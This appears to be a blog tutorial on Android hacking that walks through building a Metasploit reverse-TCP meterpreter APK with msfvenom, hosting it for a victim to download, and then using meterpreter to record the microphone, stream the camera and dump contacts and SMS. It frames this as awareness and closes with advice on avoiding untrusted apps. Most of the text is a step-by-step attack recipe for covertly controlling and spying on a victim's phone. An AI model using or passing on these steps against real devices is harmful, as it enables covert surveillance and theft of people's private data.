Android Hacking

What can happen to your android phone when you download an android application from an untrusted source? What would be its impact on your phone? Well, the results are pretty scary. You won't even know what is going on in the background of your android phone when you download a malicious application.

In this article, we will learn how an attacker can take over control on your phone when you install an application from untrusted sources. We will learn about the approach he/she can take and the results. So, let's begin.

Note: Before we proceed, please keep in mind that this tutorial/article is just for an educational purpose. This is to make everyone aware about the consequences of using android application from an untrusted/unknown sources.

I will be performing the process in my own network only. But, one can perform the attack process in any network either LAN or WAN (External network). In this process, three actors are involved:

Kali Linux Machine (Attacker)
Malicious Android application (APK)
Android Phone (Victim)

Note: Attacker and Victim are on the same network here i.e. 192.168.172.x.

Step-1: Creating Malicious Payload

You need to create a malicious android payload first. For this, login to your Kali Linux machine and follow the below command (Hope you already have installed the Kali Linux in your PC. If not, you can find tons of tutorial for installing Kali Linux over internet. I will not be wasting your time here :-D)

#msfvenom -p android/meterpreter/reverse_tcp LHOST=<ip-address> LPORT=<any unused port> -f raw > myandroid.apk

"Msfvenom, here is a command line instance of Metasploit that is used to generate and output all of the various types of shell code that are available in Metasploit."

• -p: Payload
• LHOST: Local Host
• LPORT: Local Port
• -f: Format

Step-2: Launch Metasploit Framework

Once you create your own APK, it's time launch metasploit framework using msfconsole command in Kali linux machine.

"The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. The Metasploit Framework contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection."

Once the Metasploit framework is launched, you need to use multi/handler, which is a stub that handles exploits launched outside of the framework.

Note: Make sure you're using the same payload which you have used while creating the malicious apk in Step-1.

Step-3: Host the Malicious Android Application

Now, handler is running. You need to host your malicious android application to somewhere so that victim can download it in his/her android phone.

As this process is only for our own network, you can host it there only. For this you can use one python's module called SimpleHTTPServer.

"Python’s SimpleHTTPServer is the classic quick solution for serving the files in a directory via HTTP (often, you’ll access them locally, via localhost)."

#python -m SimpleHTTPServer 8080

Note: The above command should be run under the same directory where the malicious android application is kept.

Step-4: Download the Hosted Malicious APK on Android Phone

Now, download the malicious android application using the following URL in your android phone's browser. (Please remember the IP address in the URL is your Kali Linux machine local IP address)

http://192.168.172.32:8080/myandroid.apk

Screenshot_20211007-131743_Chrome

Once the hosted APK is accessed from your android phone, you can see the logs generated in Kali Linux for SimpleHTTPServer.

simple-http-server-log

Step-5: Install and Access the Android Application

Once the apk is downloaded, install it and click on it.

combined-package-installer-and-file-resized-2

Step-6: Et Voilà !..You Got the Control

Once you click on the application, you can look into your Kali Linux machine. You must have got the meterpreter session. That means, you have the control on victim's android phone.

Step-7: Get Ready for the Killing

Now, you can type "help" command to see what you can do with the victim's phone.

help-all-combined

Step-8: Sneak Peek

As you can see, you can run numerous commands on the hacked android phone. You can dump all the contact numbers, SMS and other sensitive data. You can record the audio, switch ON the camera and even run a live webcam on victim's phone. Victim will be totally unaware about it. Here're the command below you can run to check:

meterpreter>record_mic --> To record the audio

meterpreter>webcam_snap --> To capture the image from the camera

meterpreter>webcam_stream --> To run live camera/video

As you can see, how scary it can be if you download the android application from unknown/untrusted sources.

Conclusion

So, what we learned from the activity we've done is:

Never download any android application from unknown/untrusted sources.
Always download the application from Google Play Store.
Make sure your installed application gets scanned with Google Play Protect.
Disable Installation of Unknown applications in phone Settings.

So, this is it for now. I hope this article was insightful. In the 2nd part, we will learn more sophisticated way to create malicious android application. Stay tuned..!!

Reference

https://www.offensive-security.com/metasploit-unleashed/